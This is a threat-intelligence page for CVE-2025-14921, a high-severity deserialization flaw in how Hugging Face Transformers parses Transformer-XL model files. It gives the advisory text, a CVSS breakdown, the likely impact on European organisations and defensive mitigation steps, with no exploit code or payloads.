Skip to main content
Press slash or control plus K to focus the search. Use the arrow keys to navigate results and press enter to open a threat.
Reconnecting to live updates…

CVE-2025-14921: CWE-502: Deserialization of Untrusted Data in Hugging Face Transformers

0
High
VulnerabilityCVE-2025-14921cvecve-2025-14921cwe-502
Published: Tue Dec 23 2025 (12/23/2025, 21:04:23 UTC)
Source: CVE Database V5
Vendor/Project: Hugging Face
Product: Transformers

Description

Hugging Face Transformers Transformer-XL Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25424.

AI-Powered Analysis

AILast updated: 12/23/2025, 21:20:18 UTC

Technical Analysis

CVE-2025-14921 is a deserialization vulnerability classified under CWE-502 affecting the Hugging Face Transformers library, specifically the Transformer-XL model. The vulnerability stems from inadequate validation of user-supplied data during the parsing of model files, which allows an attacker to craft malicious serialized data that, when deserialized by the library, can execute arbitrary code remotely. The flaw requires user interaction, such as opening a malicious file or visiting a malicious webpage that triggers the deserialization process. The vulnerability has a CVSS 3.0 base score of 7.8, indicating high severity, with attack vector local (AV:L), low attack complexity (AC:L), no privileges required (PR:N), user interaction required (UI:R), unchanged scope (S:U), and high impact on confidentiality, integrity, and availability (C:H/I:H/A:H). This means that while the attacker must convince a user to perform an action, no prior access or elevated privileges are needed, and successful exploitation can lead to full system compromise under the current user context. The vulnerability is particularly critical in environments where Hugging Face Transformers are used to load or process untrusted model files or data. No patches or exploits in the wild are currently reported, but the risk remains significant given the widespread use of Hugging Face in AI and ML applications. The vulnerability was assigned by ZDI (ZDI-CAN-25424) and published on December 23, 2025.

Potential Impact

For European organizations, the impact of CVE-2025-14921 can be severe, especially for those leveraging AI and machine learning frameworks that incorporate Hugging Face Transformers. Successful exploitation could lead to remote code execution, allowing attackers to compromise sensitive data, manipulate AI model outputs, or disrupt AI-driven services. This could affect sectors such as finance, healthcare, automotive, and research institutions that rely heavily on AI models for decision-making and automation. Confidentiality breaches could expose proprietary models or personal data, while integrity violations could lead to corrupted AI outputs, undermining trust in automated systems. Availability impacts could result in denial of service or ransomware deployment. Given the user interaction requirement, phishing or social engineering campaigns could be used to trigger exploitation, increasing the risk in environments with less stringent user awareness training. The lack of known exploits in the wild provides a window for proactive defense, but the high severity score underscores the urgency of mitigation.

Mitigation Recommendations

To mitigate CVE-2025-14921, European organizations should implement the following specific measures: 1) Restrict the sources of model files to trusted repositories and verify integrity using cryptographic hashes or signatures before loading them into Hugging Face Transformers. 2) Employ sandboxing or containerization to isolate the execution environment of AI models, limiting the impact of potential code execution. 3) Enhance user awareness training to reduce the risk of social engineering attacks that could lead to user interaction with malicious files or links. 4) Monitor and log deserialization activities and model loading processes to detect anomalous behavior indicative of exploitation attempts. 5) Apply strict access controls and least privilege principles to the environments running Hugging Face Transformers to minimize damage if exploitation occurs. 6) Stay updated with vendor advisories and apply patches or updates as soon as they become available. 7) Consider implementing application whitelisting to prevent unauthorized code execution. 8) Use network segmentation to isolate AI/ML infrastructure from critical business systems. These targeted actions go beyond generic advice and address the specific attack vector and exploitation conditions of this vulnerability.

Need more detailed analysis?Upgrade to Pro Console

Technical Details

Data Version
5.2
Assigner Short Name
zdi
Date Reserved
2025-12-18T20:43:19.963Z
Cvss Version
3.0
State
PUBLISHED

Threat ID: 694b064e4eddf7475afca170

Added to database: 12/23/2025, 9:14:54 PM

Last enriched: 12/23/2025, 9:20:18 PM

Last updated: 12/26/2025, 6:54:42 PM

Views: 6

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by
Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

Need more coverage?

Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.

For incident response and remediation, OffSeq services can help resolve threats faster.

Latest Threats